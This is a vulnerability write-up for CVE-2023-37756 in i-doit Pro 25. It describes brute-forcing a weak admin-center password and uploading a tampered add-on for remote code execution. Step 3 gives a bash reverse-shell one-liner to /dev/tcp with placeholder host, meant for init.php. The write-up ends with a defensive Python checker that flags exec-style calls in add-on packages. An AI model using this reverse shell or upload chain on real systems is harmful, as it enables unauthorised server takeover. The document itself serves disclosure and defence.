Related vulnerability
Title:
i-doit security vulnerability
(CVE-2023-37756)
Description: i-doit is a configuration management database (CMDB) product from the i-doit company. i-doit pro and i-doit open contain a security vulnerability caused by a weak password policy applied when creating administrator accounts, which allows an attacker to guess user passwords by brute force. Affected products and versions: i-doit Pro 25 and earlier, i-doit Open 25 and earlier.
Introduction
# CVE-2023-37756 – Weak Password Requirement in admin-center leads to malicious plugin upload in i-doit Pro 25 and below
i-doit Pro 25 and below are vulnerable to a weak password requirement in the admin-center; combined with a malicious plugin upload, this leads to remote code execution (RCE). These vulnerabilities allow an attacker to easily brute force or guess the admin-center password, gain access to the admin-center, and upload a malicious plugin to obtain remote code execution.
Description of product: i-doit is a web-based open source IT documentation and CMDB (Configuration Management Database) developed by synetics GmbH. i-doit Pro is the commercial version of the software and requires a paid license. It comes with additional features, professional support, and regular updates and enhancements. Users need to purchase a license to use i-doit Pro, and the cost varies based on the number of users and features required.
Description of vulnerability: We found that this web application has a weak password requirement in admin-center account creation: the application owner can even set a password of just 1 character with the default username “admin”. This makes it easy for an attacker to brute force or guess the password, gain access to the admin-center, and upload a malicious plugin to gain remote code execution.
Affected webpage: admin-center login page + plugin install
Affected parameter & component: admin-center login page + plugin install
Step 1: as no password requirement or password complexity is enforced during account creation for the admin-center, we can start with brute force.
The screenshot below shows that we can log in with username “admin” and password “1”.


Step 2: navigate to the Add-on tab and choose Upload.

Step 3: there are some requirements, e.g. package.json must exist, and we found that the target implements async checks of every class and function. However, we can download a proper plugin from their customer portal and edit / add to init.php; this is the safest way to prevent a system crash when the payload is triggered.
Note: put & at the end of the line to prevent a system crash after the payload is triggered; init.php is the best place to inject the payload.
Example: `exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");`



Note: remember to zip it back up and upload it.


Note: click Install, then activate the selected Add-on.

Note: the payload is triggered when someone logs in; it can be anyone.
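A defender-side check for the add-on upload path described in the steps above, added here as an example; it is not part of the original PoC or of i-doit itself. It opens an add-on zip, confirms the package.json that i-doit requires is present, and flags PHP command-execution calls such as exec() (the pattern the PoC places in init.php) for manual review before the package is installed. The sample package is constructed inline and is not a real i-doit add-on.

```python
import io
import re
import zipfile

# PHP calls whose presence in an add-on warrants manual review before
# installation; the PoC above relied on exec() placed in init.php.
DANGEROUS_CALLS = ("exec", "shell_exec", "system", "passthru",
                   "popen", "proc_open", "eval")
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(",
                     re.IGNORECASE)


def audit_addon(zip_bytes: bytes) -> dict:
    """Inspect an i-doit add-on package before it is installed.

    Returns {"has_package_json": bool,
             "findings": [(member name, line number, function name), ...]}.
    """
    findings = []
    has_package_json = False
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            base = name.rsplit("/", 1)[-1]
            if base == "package.json":
                has_package_json = True
            if not base.lower().endswith(".php"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), start=1):
                for m in CALL_RE.finditer(line):
                    findings.append((name, lineno, m.group(1).lower()))
    return {"has_package_json": has_package_json, "findings": findings}


def build_sample_addon() -> bytes:
    """Constructed sample mimicking the PoC layout (package.json + init.php)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("sample-addon/package.json",
                    '{"name": "sample-addon", "version": "1.0"}')
        zf.writestr("sample-addon/init.php",
                    "<?php\n// constructed: a shell call hidden in init.php\n"
                    "exec('echo test');\n")
        zf.writestr("sample-addon/src/Helper.php",
                    "<?php\nfunction helper() { return 42; }\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(audit_addon(build_sample_addon()))
```

Any non-empty findings list should block installation until a human has reviewed the flagged lines; a missing package.json indicates a malformed package.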

File snapshot
[4.0K] /data/pocs/bf152c221ebd7a0f4345a794d2d03aa6e0074c2c
└── [4.1K] README.md
0 directories, 1 file